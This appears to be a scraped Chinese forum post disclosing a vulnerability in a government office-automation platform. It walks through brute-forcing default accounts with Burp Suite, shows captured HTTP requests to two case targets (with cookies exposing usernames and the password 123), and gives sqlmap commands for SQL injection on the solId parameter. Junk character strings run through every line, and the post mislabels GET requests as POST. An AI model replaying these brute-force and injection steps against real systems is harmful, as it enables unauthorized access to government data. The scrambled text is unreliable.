|
- s5 e) u- E& W& b3 _6 v) D 1 v* {5 R% N% o8 Y% \+ E9 _
m" f3 a/ ?+ C2 g) m/ i/ O
! b! I- q2 t# g& B4 X T 平台简介:( ]" U% N( D* p+ A" y/ Q' |9 N
6 c7 n7 y8 W# s! R: S
$ E) _+ \4 |0 l8 {" z0 Q
) U$ c+ m6 Z2 n& x) k # P, h2 K) b5 j
; |; V2 Y3 H( Y( I3 ?- ?+ H 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。 " s9 [) w" a9 j5 C# n: r) [& u
同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。 , l, w+ \, t0 A4 C
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!
0 n% H# y: I" D * H5 n4 n' z6 O* `8 Z6 M
! a' w9 Z$ P. @+ p2 J4 U
8 O& g0 J' k! W7 X4 p% a4 B" H( [
+ b& A) a T: K0 w3 V1 v$ ?
! y0 L0 H" N3 Q' P+ d% l. M: U 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:9 _3 y) L$ n2 H
- ]2 Y2 H7 l+ W6 d& O+ O
( U* K, e1 T7 t/ }0 y+ V: O
, w h& r* f; \# w % M( K" G+ J0 p1 y/ B" {* D& v
, ^2 O/ U; O' H$ J1 Q; O' ] http://1.1.1.1:7197/cap-aco/#(案例2-)
j/ s: x8 Z4 ]9 V 5 Z; {# U& G2 ]0 J8 a% C
3 a& G( P7 G: @5 B1 e/ |
http://www.XXOO.com (案例1-官网网站)1 B# N8 ?: E8 i* M2 h" m6 |
! Q( x- T& F1 w$ \ G0 f& n
3 W$ y0 ^3 q1 i7 ^! ]
6 D8 y( j6 L( [' `% i! ?
; a# Z W, E) z6 j+ e% K7 A
' S' }4 F/ o- z1 q N0 {( m 漏洞详情:
- s* B) y) u8 b5 O / N8 _& X$ j5 i2 N' y
6 P2 O% g! a2 @, A* v 初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试" O7 Q8 Z2 m }% j% _; v1 E+ H
# N1 k" t- ? D. X0 d1 ]
! y; S% F% ~5 a% U
首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:: E& h! l1 p: X3 \3 k* @! C9 q
4 h5 f1 s1 A, R: C& K" c
2 X2 I9 r: g* c( Y
. V- u) ^3 L+ Z" e $ ?; S* k" p" u& T ]+ J- b4 D
& T* b' S) |% g, M7 n
) V% G, P% y" g8 }- n! Y
: ~: o7 A$ U9 s. m! A; `$ ~1 Y
# `' B( E3 C8 Z. B R- s status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:8 B9 f+ _1 F; G* j+ a/ ^1 I
6 C" H$ ^! S; y+ O$ G$ Q
: n: F* _7 Z3 W; g0 I& w5 A 1、案例1-官方网站
. D/ Z; m; ~& T2 H* ~! k# X ' p9 }0 a: ^4 B' F1 }2 g# a, u" v" \
# n! [1 v- D5 n GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1
0 V1 U' R3 m! S* \3 ]$ r2 L
. c/ R# E( \0 ]+ m+ w9 v
; p" R" R+ c- m' p' P; m% ? Host: www.XXOO.com. z# l6 X; _( |9 }, [2 m
# ~& s0 l {0 U( t6 w; h
^6 ~! n# R( U Proxy-Connection: Keep-Alive9 C) n6 @8 z: F) q! a4 ^
( B5 J& H+ B8 N; V4 Z; Z9 W" @# m8 Z2 |) G
Accept: application/json, text/javascript, */*; q=0.01& c; O6 K) C/ r7 Y$ Y$ R M% ~' ~
; p; \. P' i0 f! j8 p5 w2 G
# d6 R( J; _! n5 k- K) c+ n8 W; z
Accept-Language: zh-CN+ K8 R4 [: Q5 R5 b/ _
! d# G/ o1 Q- s$ y. p1 _& i' g7 E
- n/ U) @% p. B' t Content-Type: application/json
7 ?) g5 f4 R- f9 Y3 P* ~1 x% \ ' }7 y: U5 t- p* n2 F
9 ?8 W& \7 j, b: k. q3 o% ~
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko# l- t7 W& Q' W4 {1 W- w$ `8 t; P' e
6 w" P2 @& S. {5 R4 W) Q( u, }* C/ T0 Z6 w, [' w, v
X-Requested-With: XMLHttpRequest
[' S# H; [( o" F0 M
/ U' A) C. i1 R( `) s1 r$ w+ \- V$ Y: }) \ W& P/ p0 B F
Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002
/ z) o1 n5 q- `3 ~$ h2 X , m! Z5 \! ]; G) y( A o0 N" g
$ K5 @1 o( P! L Accept-Encoding: gzip, deflate, sdch
) a" W5 \7 }% f # `' ]1 x3 `5 B S7 ]) W
; b8 U) }* ~8 n0 s9 j0 ?
Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e
# x4 r. a Y" }" ?
) _) c" }3 m) Y" ]& ], {, q$ d l' m
s3 L8 p$ w$ I: ~1 b; N, g1 m 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:
' F8 i8 u- S ` D" @ G3 \! d% p 4 B4 ~9 W' u- w9 J& K
6 q. z) s2 ~/ Q) n
% \. p, ?7 L! X4 v. U
& i4 ]) l0 c4 V& P- Y/ A0 s1 v, W# Z7 n9 c& O
1 E$ k# T, I% e. `: \. \, [
& b* u+ _% S( j+ ^3 z' r& ]
/ W/ j$ D; r" V ( ^) N9 `1 t' } j, _5 g% m
% v5 t1 H4 q! t0 t
4 t5 j" s* x- ]4 }# j, A n4 X; C' Q: t8 n# n
$ d1 D8 m1 Z) L/ V" y4 l- m, H! }, R3 [. u6 K+ p7 D7 U1 `
/ B5 w( N: K1 E- ^
# n* r& r4 u6 a
8 ?# k' C3 ?, w# \/ S& x 2、案例2-某天河云平台6 c1 r5 n; ]' Z0 u, y& F- ~
+ w+ X1 x" a3 q9 h: X& H
. g. Q9 ? P1 g2 h a; R4 e# [& I GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1
- n8 h P" h! N4 H
5 M% l% q, h c" M {8 K) t: s: c5 [' w# ]
Host: 1.1.1.:7197" j* `+ n% R% i4 L
2 Z0 d3 Q& J4 n$ V4 i) o1 ~" \" M$ c0 c- u8 U* t6 N/ q' F, y1 w6 r
Accept: application/json, text/javascript, */*; q=0.01
5 m, n& T) E7 O
7 b6 F% T7 X, P% f. A* @7 x
) N4 r: U5 @( [" ^ w& x X-Requested-With: XMLHttpRequest' L$ j3 j4 @8 n2 G; x5 I
) }: l3 }- ]2 F5 o$ C% X
' H u7 y( s( r% |: Z User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0' F+ ?3 p+ h' }) ]7 Y# G$ s5 i; K
% H2 Y, g- n! b: }, p- G& y& _
% W; Y& z! }' w$ p( L' _+ C$ L Content-Type: application/json; b0 d- k" w7 ]; |1 m- ~
0 W! K J- f' s% N0 I* g4 z' q
4 s6 c2 A$ {. s9 p; D Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008
) o3 q9 u) \! e! `# U
* K z. f& ~9 p9 m2 Z5 K/ ^
5 T7 V. l; a& A: e+ q& B Accept-Language: zh-CN,zh;q=0.8+ x6 M/ V7 x- c+ @2 L
. ~5 v) Q: z" F9 W
' k$ |4 E7 _: W. j0 u
Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=14 y' T9 l7 G A. r* s5 K( v( R
/ @5 Z4 A$ K' P" |, }, B: \8 p& @/ s% k$ R% p1 J3 }; D0 K7 @
Connection: close
% M3 u; t* p" e6 w6 [ 7 s4 b9 d, g2 S. t
: D' e- { d3 P) X 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:1 t" W% m3 ^+ l- s% d; `
; K* M- x* W8 H, d/ ?: @' h2 T; `
$ v! F+ q2 r) y* o! Q ; P* M9 x9 V# L
! `2 ]- }- X u, v8 z0 d
: I# [- P, q% p/ g. l : K* N! {$ q. \* t2 q. }, C# A
|